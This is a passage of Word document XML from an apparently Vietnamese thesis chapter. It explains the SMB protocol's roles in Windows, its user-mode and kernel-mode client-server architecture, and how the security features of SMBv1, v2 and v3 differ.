        <w:t>CHƯƠNG 1. CƠ SỞ LÝ THUYẾT VÀ CÔNG CỤ KIỂM THỬ SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAFDD22" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1.1. Tổng quan về giao thức SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C346E2" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>1.1.1. Khái niệm và vai trò của SMB trong hệ điều hành Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5283044C" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Server Message Block (SMB) là giao thức truyền thông mạng hoạt động tại tầng ứng dụng (Application Layer) trong mô hình OSI, cung cấp cơ chế chia sẻ tệp tin, thư mục, máy in và hỗ trợ giao tiếp liên tiến trình (Inter-Process Communication - IPC) giữa các máy tính trong mạng nội bộ [1]. Trên hệ điều hành Windows, SMB là giao thức truyền thông mặc định cho các dịch vụ chia sẻ tài nguyên, vận hành trực tiếp trên nền giao thức TCP qua cổng 445 hoặc thông qua tầng trung gian NetBIOS over TCP/IP (NBT) qua cổng 139 [2].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0748BA4B" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Trong kiến trúc hệ thống Windows, giao thức SMB đảm nhiệm bốn vai trò kỹ thuật chính:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1F8B31" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Chia sẻ tệp tin và dữ liệu từ xa:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cho phép người dùng và ứng dụng thực hiện các thao tác đọc, ghi, tạo mới, khóa tệp và điều chỉnh thuộc tính trực tiếp trên các thư mục chia sẻ qua mạng (Network Shares) với trải nghiệm tương tự thao tác trên hệ thống tệp cục bộ [3].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312B9644" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Quản lý thiết bị in ấn nội bộ:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Hỗ trợ tiếp nhận lệnh in, chuyển tiếp luồng dữ liệu in và điều phối hàng đợi tài liệu đối với các máy in dùng chung [2].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703082C5" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Giao tiếp liên tiến trình (IPC) và quản trị từ xa:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cung cấp cơ chế đường ống định danh (Named Pipes) phục vụ việc truyền tải các lệnh gọi thủ tục từ xa (Remote Procedure Call - RPC). SMB Named Pipes hỗ trợ một số cơ chế RPC và các tác vụ quản trị từ xa của Windows, đặc biệt đối với các dịch vụ được triển khai qua named pipe [3], [4].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1015B821" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Xác thực và kiểm soát quyền truy cập:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Tích hợp với hệ thống an ninh nội tại của Windows (sử dụng giao thức xác thực NTLM hoặc Kerberos), cho phép máy chủ kiểm tra danh tính và đối chiếu quyền hạn của người dùng trước khi cấp quyền thao tác với tài nguyên [4].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C458782" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.1.2. Mô hình Client – Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026C3E94" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Dịch vụ SMB trên hệ điều hành Windows vận hành theo mô hình Client – Server, được phân định giữa không gian người dùng (User Mode) và không gian nhân hệ điều hành (Kernel Mode) [3]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA957A9" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Phía SMB Client:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Dịch vụ Workstation (tiến trình </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>LanmanWorkstation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) tại User Mode tiếp nhận yêu cầu truy xuất tài nguyên mạng từ các ứng dụng người dùng thông qua đường dẫn UNC (Universal Naming Convention, dạng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>\\Server\Share\File</w:t>
      </w:r>
      <w:r>
        <w:t>). Yêu cầu này sau đó được chuyển giao xuống trình chuyển hướng mạng ở tầng kernel để đóng gói thành bản tin SMB và truyền qua ngăn xếp mạng TCP/IP [3].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3494A219" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Phía SMB Server:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Dịch vụ Server (tiến trình </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>LanmanServer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) tại User Mode quản lý cấu hình chia sẻ, đồng thời sử dụng trình điều khiển chế độ nhân trực tiếp để xử lý các gói tin mạng nhận về. Đối với các phiên bản SMBv1, thành phần điều khiển cốt lõi trong kernel là driver </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>srv.sys</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> [3], [4].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451B704C" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Việc xử lý phân tích cú pháp (parsing) bản tin và thực thi các thao tác I/O của SMB Server ngay trong Kernel Mode giúp tối ưu hiệu năng truyền tải dữ liệu. Tuy nhiên, kiến trúc này đặt ra rủi ro kỹ thuật: nếu driver xử lý gói tin trong kernel xuất hiện lỗi kiểm tra biên bộ nhớ, kẻ tấn công có thể lợi dụng để thực thi mã với đặc quyền của tài khoản hệ thống (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>NT AUTHORITY\SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:t>), hoặc gây lỗi dừng hệ điều hành (màn hình xanh - BSOD) [3], [5].</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8784"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB6619" w14:paraId="22AD8A00" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8784" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="48AFFDEF" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>+-------------------------------------------------------------------------+</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|                                USER MODE                                |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|  +---------------------------+           +---------------------------+  |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|  |     Ứng dụng người dùng   |           |    Dịch vụ quản trị       |  |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|  +-------------+-------------+           +-------------+-------------+  |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|                | API I/O                               | RPC / Named    |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|                v                                       v     Pipes      |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|  +---------------------------+           +---------------------------+  |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|  | LanmanWorkstation Service |           |   LanmanServer Service    |  |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|  +---------------------------+           +---------------------------+  |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>+------------------------------------+------------------------------------+</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">                                     | Chuyển giao I/O</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>+------------------------------------+------------------------------------+</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|                               KERNEL MODE                               |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|  +---------------------------+           +---------------------------+  |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|  |    Trình chuyển hướng     |           |     SMB Server Driver     |  |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|  |     (Network Client)      |           |         (srv.sys)         |  |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|  +-------------+-------------+           +-------------^-------------+  |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|                | Đóng gói bản tin                      | Phân tích cú   |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|                v                                       | pháp bản tin   |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|  +---------------------------+           +-------------+-------------+  |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|  |    Ngăn xếp TCP/IP        |           |    Ngăn xếp TCP/IP        |  |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|  |       (tcpip.sys)         |&lt;=========&gt;|       (tcpip.sys)         |  |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>|  +---------------------------+  TCP 445  +---------------------------+  |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|          [SMB Client]           TCP 139          [SMB Server]           |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>+-------------------------------------------------------------------------+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7693E31C" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00DB6619"/>
    <w:p w14:paraId="227CA375" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Sơ đồ 1.1: Kiến trúc phân tầng Client – Server của dịch vụ SMB trên Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229783C4" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>1.1.3. Phân biệt SMBv1, SMBv2 và SMBv3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A6BBE3" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Giao thức Server Message Block đã trải qua ba thế hệ phiên bản chính, phản ánh sự thay đổi về hiệu năng truyền tải và cơ chế an toàn thông tin [1], [6]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C82CA74" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="120" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1E293B"/>
        </w:rPr>
        <w:t>1. Phiên bản SMBv1 (CIFS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409DBFEC" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Được phát triển từ những năm 1980 và tích hợp sâu từ các thế hệ Windows NT/2000/XP. SMBv1 hỗ trợ hơn 100 mã lệnh điều khiển (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SMB_COM_*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). SMBv1 sử dụng tập lệnh lớn và nhiều thao tác đòi hỏi các lượt yêu cầu – phản hồi (request–response) riêng biệt, làm tăng độ trễ và lưu lượng trao đổi (chatty protocol) của giao thức [1], [6]. Về mặt an ninh, SMBv1 không hỗ trợ mã hóa luồng dữ liệu, cơ chế ký số (SMB Signing) dựa trên hàm băm MD5; cấu trúc driver xử lý </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>srv.sys</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> phức tạp, tiềm ẩn nhiều lỗi quản lý bộ nhớ [5], [7].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED89D44" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="120" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1E293B"/>
        </w:rPr>
        <w:t>2. Phiên bản SMBv2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5716466B" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Được Microsoft giới thiệu từ Windows Vista và Windows Server 2008 nhằm thay thế SMBv1. SMBv2 tinh giản tập mã lệnh xuống còn 19 lệnh tiêu chuẩn (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SMB2_*</w:t>
      </w:r>
      <w:r>
        <w:t>), bổ sung tính năng gộp lệnh (Compounding) cho phép ghép nhiều yêu cầu (ví dụ: mở tệp, đọc tệp, đóng tệp) trong một gói tin duy nhất [6]. SMBv2 nâng cấp cơ chế ký số chống giả mạo lên thuật toán HMAC-SHA256, mở rộng bộ nhớ đệm và hỗ trợ xử lý I/O bất đồng bộ, giúp nâng cao hiệu năng và độ ổn định [3], [6].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C985582" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="120" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1E293B"/>
        </w:rPr>
        <w:t>3. Phiên bản SMBv3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B151F83" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Được giới thiệu từ Windows 8 và Windows Server 2012, tiếp tục hoàn thiện trên Windows 10 và Windows Server 2016 với các cơ chế bảo mật theo từng dialect cụ thể [6], [7]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0466C2C7" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SMB 3.0 (Windows 8 / Server 2012):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Bổ sung tính năng mã hóa dữ liệu đầu cuối (SMB Encryption) ở tầng ứng dụng bằng thuật toán mã hóa khối đối xứng AES-128-CCM (Counter with CBC-MAC), loại bỏ sự phụ thuộc vào hạ tầng IPsec; nâng cấp cơ chế ký số sang thuật toán AES-128-CMAC; đồng thời bổ sung cơ chế đàm phán phương ngữ an toàn (Secure Dialect Negotiation) nhằm </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ngăn chặn kẻ tấn công đứng giữa can thiệp sửa đổi gói tin Negotiate để hạ cấp giao thức [7].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754B0C21" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SMB 3.0.2 (Windows 8.1 / Server 2012 R2):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Tối ưu hóa hiệu năng của thuật toán AES trong xử lý dữ liệu. Đồng thời từ phiên bản hệ điều hành này, Windows cung cấp khả năng quản trị cho phép gỡ bỏ hoặc vô hiệu hóa hoàn toàn tính năng SMBv1 thông qua công cụ quản lý của hệ điều hành [7], [8].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1D44E6" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SMB 3.1.1 (Windows 10 / Server 2016 trở lên):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Bổ sung chế độ mã hóa AES-128-GCM (Galois/Counter Mode); tích hợp cơ chế bảo vệ tính toàn vẹn tiền xác thực (Pre-authentication Integrity). Cơ chế này sử dụng hàm băm SHA-512 tính toán trên chuỗi bản tin đàm phán (Negotiate và Session Setup) từ trước khi phiên xác thực hoàn tất; nếu kẻ tấn công can thiệp làm sai lệch năng lực bảo mật hoặc ép hạ cấp giao thức, chuỗi băm sẽ không khớp và kết nối bị hủy bỏ [7].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE90F96" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Mối liên hệ với đề tài:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Dịch vụ SMBv2 và SMBv3 vận hành trên driver tách biệt (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>srv2.sys</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) chứ không sử dụng driver </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>srv.sys</w:t>
      </w:r>
      <w:r>
